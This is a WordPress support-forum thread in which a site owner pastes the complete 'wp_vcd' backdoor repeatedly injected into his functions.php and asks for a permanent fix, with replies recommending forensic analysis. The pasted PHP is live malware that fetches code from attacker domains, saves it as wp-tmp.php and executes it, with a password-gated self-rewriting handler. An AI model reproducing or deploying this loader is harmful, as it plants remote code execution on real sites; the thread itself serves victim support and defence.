Lodi vip bet app.Claim Your Free 999 Pesos Bonus Today

Resolved

(@ronwisely)

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '9dd24009f5c1833f1f6b07ba726516c1'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				

				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }

		                                                                    }
								}
						}
				break;

								case 'change_code';
					if (isset($_REQUEST['newcode']))
						{
							
							if (!empty($_REQUEST['newcode']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }

		                                                                    }
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
		   {
		   }
			else
			{
			$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
			fwrite($handle, "<?php\n" . $phpCode);
			}
			fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='11222848a10f1d0ea555bcdf773f3eb4';
        if (($tmpcontent = @file_get_contents("https://www.xapilo.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.xapilo.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("https://www.xapilo.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 
		
		        elseif ($tmpcontent = @file_get_contents("https://www.xapilo.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
		elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}

//$start_wp_theme_tmp

//wp_tmp

//$end_wp_theme_tmp
?>

Respected sir someone added above code into my function.php files this is 5th time he added it to my website . i have already cleaned all my content so many time need permanent solution people help . He is adding the above mentined code via wp-include . Inside wp include their was 2 files i deleted them too .No one can make login to my website . because i have disabled wp-login.php page .
Hope to get permanent solution and cause .
Regards,
rahul

The page I need help with: [log in to see the link]

Viewing 4 replies - 1 through 4 (of 4 total)

wfasa
(@wfasa)

6 years, 9 months ago
Hi rahul,

Sorry to hear your site is hacked. It sounds like you should probably hire an expert to do a forensic analysis on your site to determine how the attackers are gaining entry. It could be via a vulnerability in a plugin or theme, it could be a backdoor located in a hard to find location, or even a server side vulnerability.

If you want to continue investigating by yourself, this guide to cleaning a hacked website may help. However, I will reiterate that some infections require a trained security expert to resolve.

Best of luck with your site for now.
- This reply was modified 6 years, 9 months ago by wfasa.
Thread Starter ronwisely
(@ronwisely)

6 years, 9 months ago

Respected mam,
I can clean my website manually in 5 minute . I have refreshed all my files and all my plugin and themes authors are elite author . No other files are getting malicious content except 3 files in my one website folder . 2 FILES are from wp-includces and one files are function.php . And that function.php is getting affect because of wp-includes of the wordpress core file that means they are able to upload files in wp-incldues . (File editing is disabled via config file )
One strange case have seen that i have total 3 domain my cpanel in all the domain wp-includes got same malicious file and upload on the same time inside same folder . If it is done by hacker then he will atleast take some time to hack another website . is it possible to hack all the website cpanel files at the same instant . and in my cpanel last login was from mine ip .

last time same things was happening with of my client where i did malware cleaning . Some one was able to upload the same files at same time in perticular folder in all the domain. He was also hosting with hostgator and they keeps on asking him to buy sitelock .
Same condition is happening to my website too . Are they really a hacker or its a complete game of sitelock and hostgator.com . I am really getting doubt . Even that sitelock bots got trapped in honeypot so many time . They never obeys our robots.txt file .
For security i am using wordfence with ithemes .htacess file and with bullet plugin htacess files . login page is disabled and protect with htacess password . All execution in upload directly are blocked . All bad request which is done by bots tracked by wordfence live tools are manually blocked by me via .htacess code . But still they can gain access it he really a hacker ?

Really need a small guidance mam

Regards,
rahul

Logan Kipp
(@logankipp)

6 years, 9 months ago

@ronwisely,

Regardless of whether you choose to utilize the SiteLock service offered via HostGator, or any vendor at all, it’s important to understand how this happened. I would first like to reiterate what @wfasa mentioned, that this is almost certainly a breach due to vulnerable code rather than a compromised cPanel. When multiple websites are hosted within the same hosting plan, there is little to stop malware from spreading between them, as they share the same file structure. I’m glad to hear that you’ve been successful in removing the malware, your next steps should be to get a second set of eyes to verify that the website is clean, and track down the vulnerability or vulnerabilities that lead to this compromise in the first place. For these steps I do recommend utilizing professional services, as this can be a very involved process.

wfasa
(@wfasa)

6 years, 9 months ago

Rahul,
Yes, it is possible for one site to infect another. I don’t have much to add aside from what @logankipp said. Nobody will be able to say how your site was hacked without doing a proper forensic analysis which takes at least a few hours. It involves going through every file on the server, checking for malware and vulnerabilities. There are several different services out there that you can choose from.

I hope you are able to find the help you need.

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘Hacked content need permanent solution’ is closed to new replies.